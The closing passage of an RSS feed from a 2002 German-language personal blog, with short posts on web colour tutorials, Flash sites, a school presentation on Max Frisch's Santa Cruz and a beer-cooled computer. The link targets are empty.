  17993. ]]></content:encoded>
  17994.  </item>
  17996.  <item>
  17997.    <title>Farbenlehre</title>
  17998.    <link></link>
  17999.    <guid isPermaLink="true"></guid>
  18000.    <dc:creator>Andreas Jaggi</dc:creator>
  18001.    <creativeCommons:license></creativeCommons:license>
  18002.    <pubDate>Thu, 06 Jun 2002 22:08:00 +0200</pubDate>
  18003.    <category domain="">Webdesign</category>
  18004.    <description><![CDATA[Auf <a href="" target="_blank"><b></b></a> hat es ein IMHO sehr gutes Tutorial zum Thema <b>Farben im Internet</b>. Besonders geeignet für Leute, die, wie ich, im Umgang mit Farben nicht besonders geschickt sind. ;-)
  18005. ]]></description>
  18006.    <content:encoded><![CDATA[Auf <a href="" target="_blank"><b></b></a> hat es ein IMHO sehr gutes Tutorial zum Thema <b>Farben im Internet</b>. Besonders geeignet für Leute, die, wie ich, im Umgang mit Farben nicht besonders geschickt sind. ;-)
  18007. ]]></content:encoded>
  18008.  </item>
  18010.  <item>
  18011.    <title>Gelungene Kombination</title>
  18012.    <link></link>
  18013.    <guid isPermaLink="true"></guid>
  18014.    <dc:creator>Andreas Jaggi</dc:creator>
  18015.    <creativeCommons:license></creativeCommons:license>
  18016.    <pubDate>Tue, 04 Jun 2002 22:46:00 +0200</pubDate>
  18017.    <category domain="">Misc</category>
  18018.    <description><![CDATA[Die Website von <a href="" target="_blank"><b>Mediapride</b></a> setzt Flash sehr geschickt ein. Man beachte die elegante Navigationsleiste.
  18019. ]]></description>
  18020.    <content:encoded><![CDATA[Die Website von <a href="" target="_blank"><b>Mediapride</b></a> setzt Flash sehr geschickt ein. Man beachte die elegante Navigationsleiste.
  18021. ]]></content:encoded>
  18022.  </item>
  18024.  <item>
  18025.    <title>Referat über Max Frisch - Santa Cruz</title>
  18026.    <link></link>
  18027.    <guid isPermaLink="true"></guid>
  18028.    <dc:creator>Andreas Jaggi</dc:creator>
  18029.    <creativeCommons:license></creativeCommons:license>
  18030.    <pubDate>Tue, 04 Jun 2002 01:49:00 +0200</pubDate>
  18031.    <category domain="">Misc</category>
  18032.    <description><![CDATA[Endlich! Nach <b>langer</b> und <b>harter</b> Arbeit ist mein 15-Minuten-Referat über das Stück Santa Cruz von Max Frisch fertig.<br><br>Zur Belohnung gibt es einen Einblick in meine Lieblingsstadt (leider nur für IE-Benutzer):<br>
  18033. <a href="javascript:var cam ='','cam','directories=no,fullscreen=no,height=291,innerHeight=291,innerWidth=358,location=no,menubar=no,personalbar=no,resizable=yes,scrollbars=no,status=no,toolbar=no,titlebar=no,width=358');">Klick!</a>
  18034. ]]></description>
  18035.    <content:encoded><![CDATA[Endlich! Nach <b>langer</b> und <b>harter</b> Arbeit ist mein 15-Minuten-Referat über das Stück Santa Cruz von Max Frisch fertig.<br><br>Zur Belohnung gibt es einen Einblick in meine Lieblingsstadt (leider nur für IE-Benutzer):<br>
  18036. <a href="javascript:var cam ='','cam','directories=no,fullscreen=no,height=291,innerHeight=291,innerWidth=358,location=no,menubar=no,personalbar=no,resizable=yes,scrollbars=no,status=no,toolbar=no,titlebar=no,width=358');">Klick!</a>
  18037. ]]></content:encoded>
  18038.  </item>
  18040.  <item>
  18041.    <title>Bier-Computer</title>
  18042.    <link></link>
  18043.    <guid isPermaLink="true"></guid>
  18044.    <dc:creator>Andreas Jaggi</dc:creator>
  18045.    <creativeCommons:license></creativeCommons:license>
  18046.    <pubDate>Mon, 03 Jun 2002 16:14:00 +0200</pubDate>
  18047.    <category domain="">Misc</category>
  18048.    <description><![CDATA[Bei diesem Modell ist die <b>*Kühlung*</b> sicher kein Problem. Jedenfalls für den Benutzer. ;-)<br><br><img src="" width="246" height="350" style="border: 1px solid #454545;" alt="Bier-Computer"><br><br>Gefunden bei <a href="" target="_blank"></a>
  18049. ]]></description>
  18050.    <content:encoded><![CDATA[Bei diesem Modell ist die <b>*Kühlung*</b> sicher kein Problem. Jedenfalls für den Benutzer. ;-)<br><br><img src="" width="246" height="350" style="border: 1px solid #454545;" alt="Bier-Computer"><br><br>Gefunden bei <a href="" target="_blank"></a>
  18051. ]]></content:encoded>
  18052.  </item>
  18054.  <item>
  18055.    <title>Flash-Sites</title>
  18056.    <link></link>
  18057.    <guid isPermaLink="true"></guid>
  18058.    <dc:creator>Andreas Jaggi</dc:creator>
  18059.    <creativeCommons:license></creativeCommons:license>
  18060.    <pubDate>Mon, 03 Jun 2002 08:50:00 +0200</pubDate>
  18061.    <category domain="">Webdesign</category>
  18062.    <description><![CDATA[Beim (<b>*unerlaubten*</b>) Surfen aufgefallen:<br><a href=""></a>
  18063. ]]></description>
  18064.    <content:encoded><![CDATA[Beim (<b>*unerlaubten*</b>) Surfen aufgefallen:<br><a href=""></a>
  18065. ]]></content:encoded>
  18066.  </item>
  18068. </channel>
  18069. </rss>

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Software created by Sam Ruby, Mark Pilgrim, Joseph Walton and Phil Ringnalda